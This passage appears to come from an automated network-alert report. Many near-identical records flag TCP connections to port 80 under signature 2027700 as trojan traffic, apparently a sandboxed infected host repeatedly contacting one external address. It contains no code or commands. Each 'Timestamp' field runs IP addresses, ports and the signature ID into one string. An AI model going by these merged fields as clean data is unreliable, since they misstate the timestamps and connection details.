                          Source Port:50401
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450009802027700 02/07/23-20:02:13.165566
                          SID:2027700
                          Source Port:50009
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450107802027700 02/07/23-20:02:41.686560
                          SID:2027700
                          Source Port:50107
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450205802027700 02/07/23-20:03:08.738599
                          SID:2027700
                          Source Port:50205
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450303802027700 02/07/23-20:03:35.307803
                          SID:2027700
                          Source Port:50303
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450168802027700 02/07/23-20:02:59.953138
                          SID:2027700
                          Source Port:50168
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449938802027700 02/07/23-20:01:52.305588
                          SID:2027700
                          Source Port:49938
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450266802027700 02/07/23-20:03:26.196925
                          SID:2027700
                          Source Port:50266
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450299802027700 02/07/23-20:03:34.321474
                          SID:2027700
                          Source Port:50299
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449778802027700 02/07/23-20:01:04.997293
                          SID:2027700
                          Source Port:49778
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449815802027700 02/07/23-20:01:16.077954
                          SID:2027700
                          Source Port:49815
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449871802027700 02/07/23-20:01:32.342194
                          SID:2027700
                          Source Port:49871
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449773802027700 02/07/23-20:01:04.038338
                          SID:2027700
                          Source Port:49773
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449913802027700 02/07/23-20:01:42.565044
                          SID:2027700
                          Source Port:49913
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449974802027700 02/07/23-20:02:00.945242
                          SID:2027700
                          Source Port:49974
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450241802027700 02/07/23-20:03:17.535341
                          SID:2027700
                          Source Port:50241
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449876802027700 02/07/23-20:01:33.586090
                          SID:2027700
                          Source Port:49876
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450143802027700 02/07/23-20:02:53.873531
                          SID:2027700
                          Source Port:50143
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449720802027700 02/07/23-20:00:51.202653
                          SID:2027700
                          Source Port:49720
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450045802027700 02/07/23-20:02:22.023470
                          SID:2027700
                          Source Port:50045
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450397802027700 02/07/23-20:03:58.395001
                          SID:2027700
                          Source Port:50397
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450037802027700 02/07/23-20:02:20.092570
                          SID:2027700
                          Source Port:50037
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450233802027700 02/07/23-20:03:15.578132
                          SID:2027700
                          Source Port:50233
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449781802027700 02/07/23-20:01:05.723794
                          SID:2027700
                          Source Port:49781
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450392802027700 02/07/23-20:03:57.167562
                          SID:2027700
                          Source Port:50392
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450434802027700 02/07/23-20:04:07.488023
                          SID:2027700
                          Source Port:50434
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449868802027700 02/07/23-20:01:31.598757
                          SID:2027700
                          Source Port:49868
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450196802027700 02/07/23-20:03:06.562601
                          SID:2027700
                          Source Port:50196
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450238802027700 02/07/23-20:03:16.812392
                          SID:2027700
                          Source Port:50238
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450406802027700 02/07/23-20:04:00.598596
                          SID:2027700
                          Source Port:50406
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449740802027700 02/07/23-20:00:56.170997
                          SID:2027700
                          Source Port:49740
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449810802027700 02/07/23-20:01:15.107347
                          SID:2027700
                          Source Port:49810
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449851802027700 02/07/23-20:01:24.881497
                          SID:2027700
                          Source Port:49851
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449946802027700 02/07/23-20:01:54.317743
                          SID:2027700
                          Source Port:49946
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450311802027700 02/07/23-20:03:37.282022
                          SID:2027700
                          Source Port:50311
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450274802027700 02/07/23-20:03:28.142137
                          SID:2027700
                          Source Port:50274
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450470802027700 02/07/23-20:04:16.255518
                          SID:2027700
                          Source Port:50470
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450020802027700 02/07/23-20:02:15.924236
                          SID:2027700
                          Source Port:50020
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450078802027700 02/07/23-20:02:33.896004
                          SID:2027700
                          Source Port:50078
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449905802027700 02/07/23-20:01:40.596381
                          SID:2027700
                          Source Port:49905
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450369802027700 02/07/23-20:03:51.539852
                          SID:2027700
                          Source Port:50369
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450115802027700 02/07/23-20:02:43.638524
                          SID:2027700
                          Source Port:50115
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450328802027700 02/07/23-20:03:41.453966
                          SID:2027700
                          Source Port:50328
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450439802027700 02/07/23-20:04:08.690442
                          SID:2027700
                          Source Port:50439
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450246802027700 02/07/23-20:03:18.721408
                          SID:2027700
                          Source Port:50246
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449900802027700 02/07/23-20:01:39.360455
                          SID:2027700
                          Source Port:49900
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450148802027700 02/07/23-20:02:55.124323
                          SID:2027700
                          Source Port:50148
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449884802027700 02/07/23-20:01:35.347764
                          SID:2027700
                          Source Port:49884
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449921802027700 02/07/23-20:01:45.051140
                          SID:2027700
                          Source Port:49921
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450421802027700 02/07/23-20:04:04.274057
                          SID:2027700
                          Source Port:50421
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449798802027700 02/07/23-20:01:12.233155
                          SID:2027700
                          Source Port:49798
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450127802027700 02/07/23-20:02:47.079664
                          SID:2027700
                          Source Port:50127
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450454802027700 02/07/23-20:04:12.348170
                          SID:2027700
                          Source Port:50454
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450102802027700 02/07/23-20:02:40.427300
                          SID:2027700
                          Source Port:50102
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450200802027700 02/07/23-20:03:07.560016
                          SID:2027700
                          Source Port:50200
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450356802027700 02/07/23-20:03:48.331429
                          SID:2027700
                          Source Port:50356
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449737802027700 02/07/23-20:00:55.466122
                          SID:2027700
                          Source Port:49737
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449835802027700 02/07/23-20:01:20.965850
                          SID:2027700
                          Source Port:49835
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450163802027700 02/07/23-20:02:58.736661
                          SID:2027700
                          Source Port:50163
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450418802027700 02/07/23-20:04:03.565176
                          SID:2027700
                          Source Port:50418
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449918802027700 02/07/23-20:01:43.801204
                          SID:2027700
                          Source Port:49918
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450098802027700 02/07/23-20:02:39.366201
                          SID:2027700
                          Source Port:50098
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450282802027700 02/07/23-20:03:30.132022
                          SID:2027700
                          Source Port:50282
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450348802027700 02/07/23-20:03:46.349889
                          SID:2027700
                          Source Port:50348
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449830802027700 02/07/23-20:01:19.753947
                          SID:2027700
                          Source Port:49830
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450218802027700 02/07/23-20:03:11.936212
                          SID:2027700
                          Source Port:50218
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449954802027700 02/07/23-20:01:56.265159
                          SID:2027700
                          Source Port:49954
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450135802027700 02/07/23-20:02:51.914333
                          SID:2027700
                          Source Port:50135
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450389802027700 02/07/23-20:03:56.428558
                          SID:2027700
                          Source Port:50389
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450057802027700 02/07/23-20:02:25.359863
                          SID:2027700
                          Source Port:50057
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449729802027700 02/07/23-20:00:53.543429
                          SID:2027700
                          Source Port:49729
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450213802027700 02/07/23-20:03:10.733288
                          SID:2027700
                          Source Port:50213
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450029802027700 02/07/23-20:02:18.139693
                          SID:2027700
                          Source Port:50029
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450467802027700 02/07/23-20:04:15.494809
                          SID:2027700
                          Source Port:50467
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450176802027700 02/07/23-20:03:01.908838
                          SID:2027700
                          Source Port:50176
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450093802027700 02/07/23-20:02:38.122439
                          SID:2027700
                          Source Port:50093
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449926802027700 02/07/23-20:01:49.382340
                          SID:2027700
                          Source Port:49926
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449802802027700 02/07/23-20:01:13.174021
                          SID:2027700
                          Source Port:49802
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450130802027700 02/07/23-20:02:48.878883
                          SID:2027700
                          Source Port:50130
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450384802027700 02/07/23-20:03:55.223735
                          SID:2027700
                          Source Port:50384
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449765802027700 02/07/23-20:01:02.096121
                          SID:2027700
                          Source Port:49765
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450426802027700 02/07/23-20:04:05.502601
                          SID:2027700
                          Source Port:50426
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449807802027700 02/07/23-20:01:14.403500
                          SID:2027700
                          Source Port:49807
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450000802027700 02/07/23-20:02:10.893167
                          SID:2027700
                          Source Port:50000
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450254802027700 02/07/23-20:03:20.750307
                          SID:2027700
                          Source Port:50254
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449848802027700 02/07/23-20:01:24.096025
                          SID:2027700
                          Source Port:49848
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449889802027700 02/07/23-20:01:36.602318
                          SID:2027700
                          Source Port:49889
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450278802027700 02/07/23-20:03:29.144513
                          SID:2027700
                          Source Port:50278
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450024802027700 02/07/23-20:02:16.923135
                          SID:2027700
                          Source Port:50024
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449990802027700 02/07/23-20:02:05.389458
                          SID:2027700
                          Source Port:49990
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450085802027700 02/07/23-20:02:35.926262
                          SID:2027700
                          Source Port:50085
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450183802027700 02/07/23-20:03:03.375286
                          SID:2027700
                          Source Port:50183
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450281802027700 02/07/23-20:03:29.880685
                          SID:2027700
                          Source Port:50281
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450094802027700 02/07/23-20:02:38.377724
                          SID:2027700
                          Source Port:50094
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450447802027700 02/07/23-20:04:10.628545
                          SID:2027700
                          Source Port:50447
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450192802027700 02/07/23-20:03:05.567549
                          SID:2027700
                          Source Port:50192
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450349802027700 02/07/23-20:03:46.609528
                          SID:2027700
                          Source Port:50349
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450419802027700 02/07/23-20:04:03.800341
                          SID:2027700
                          Source Port:50419
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450422802027700 02/07/23-20:04:04.527765
                          SID:2027700
                          Source Port:50422
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449803802027700 02/07/23-20:01:13.424990
                          SID:2027700
                          Source Port:49803
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449901802027700 02/07/23-20:01:39.612533
                          SID:2027700
                          Source Port:49901
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450324802027700 02/07/23-20:03:40.470050
                          SID:2027700
                          Source Port:50324
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450189802027700 02/07/23-20:03:04.831775
                          SID:2027700
                          Source Port:50189
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450413802027700 02/07/23-20:04:02.323273
                          SID:2027700
                          Source Port:50413
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449959802027700 02/07/23-20:01:57.490225
                          SID:2027700
                          Source Port:49959
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449793802027700 02/07/23-20:01:11.030637
                          SID:2027700
                          Source Port:49793
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450221802027700 02/07/23-20:03:12.688306
                          SID:2027700
                          Source Port:50221
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449732802027700 02/07/23-20:00:54.261632
                          SID:2027700
                          Source Port:49732
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449986802027700 02/07/23-20:02:03.914624
                          SID:2027700
                          Source Port:49986
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450351802027700 02/07/23-20:03:47.097069
                          SID:2027700
                          Source Port:50351
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450155802027700 02/07/23-20:02:56.813184
                          SID:2027700
                          Source Port:50155
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450380802027700 02/07/23-20:03:54.222459
                          SID:2027700
                          Source Port:50380
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449897802027700 02/07/23-20:01:38.564289
                          SID:2027700
                          Source Port:49897
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449856802027700 02/07/23-20:01:28.475142
                          SID:2027700
                          Source Port:49856
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450114802027700 02/07/23-20:02:43.402147
                          SID:2027700
                          Source Port:50114
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450310802027700 02/07/23-20:03:37.027404
                          SID:2027700
                          Source Port:50310
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450368802027700 02/07/23-20:03:51.253026
                          SID:2027700
                          Source Port:50368
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450025802027700 02/07/23-20:02:17.165507
                          SID:2027700
                          Source Port:50025
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450066802027700 02/07/23-20:02:30.943302
                          SID:2027700
                          Source Port:50066
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450262802027700 02/07/23-20:03:23.849061
                          SID:2027700
                          Source Port:50262
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450279802027700 02/07/23-20:03:29.390956
                          SID:2027700
                          Source Port:50279
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450475802027700 02/07/23-20:04:17.464492
                          SID:2027700
                          Source Port:50475
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449917802027700 02/07/23-20:01:43.562458
                          SID:2027700
                          Source Port:49917
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449822802027700 02/07/23-20:01:17.781118
                          SID:2027700
                          Source Port:49822
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449958802027700 02/07/23-20:01:57.237616
                          SID:2027700
                          Source Port:49958
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450209802027700 02/07/23-20:03:09.736543
                          SID:2027700
                          Source Port:50209
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449828802027700 02/07/23-20:01:19.281463
                          SID:2027700
                          Source Port:49828
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449733802027700 02/07/23-20:00:54.497423
                          SID:2027700
                          Source Port:49733
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449863802027700 02/07/23-20:01:30.373662
                          SID:2027700
                          Source Port:49863
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450352802027700 02/07/23-20:03:47.357138
                          SID:2027700
                          Source Port:50352
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449774802027700 02/07/23-20:01:04.281618
                          SID:2027700
                          Source Port:49774
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449987802027700 02/07/23-20:02:04.169864
                          SID:2027700
                          Source Port:49987
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450441802027700 02/07/23-20:04:09.174122
                          SID:2027700
                          Source Port:50441
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449875802027700 02/07/23-20:01:33.341460
                          SID:2027700
                          Source Port:49875
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450142802027700 02/07/23-20:02:53.636957
                          SID:2027700
                          Source Port:50142
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449872802027700 02/07/23-20:01:32.599241
                          SID:2027700
                          Source Port:49872
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449777802027700 02/07/23-20:01:04.763085
                          SID:2027700
                          Source Port:49777
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450240802027700 02/07/23-20:03:17.295970
                          SID:2027700
                          Source Port:50240
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450396802027700 02/07/23-20:03:58.143968
                          SID:2027700
                          Source Port:50396
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449780802027700 02/07/23-20:01:05.481040
                          SID:2027700
                          Source Port:49780
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450139802027700 02/07/23-20:02:52.924797
                          SID:2027700
                          Source Port:50139
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449869802027700 02/07/23-20:01:31.842864
                          SID:2027700
                          Source Port:49869
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449786802027700 02/07/23-20:01:08.155419
                          SID:2027700
                          Source Port:49786
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450323802027700 02/07/23-20:03:40.235917
                          SID:2027700
                          Source Port:50323
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450151802027700 02/07/23-20:02:55.858238
                          SID:2027700
                          Source Port:50151
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450225802027700 02/07/23-20:03:13.640810
                          SID:2027700
                          Source Port:50225
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450479802027700 02/07/23-20:04:18.422959
                          SID:2027700
                          Source Port:50479
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450053802027700 02/07/23-20:02:24.008849
                          SID:2027700
                          Source Port:50053
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450136802027700 02/07/23-20:02:52.154928
                          SID:2027700
                          Source Port:50136
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450234802027700 02/07/23-20:03:15.828144
                          SID:2027700
                          Source Port:50234
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450081802027700 02/07/23-20:02:34.618171
                          SID:2027700
                          Source Port:50081
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449933802027700 02/07/23-20:01:51.094138
                          SID:2027700
                          Source Port:49933
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
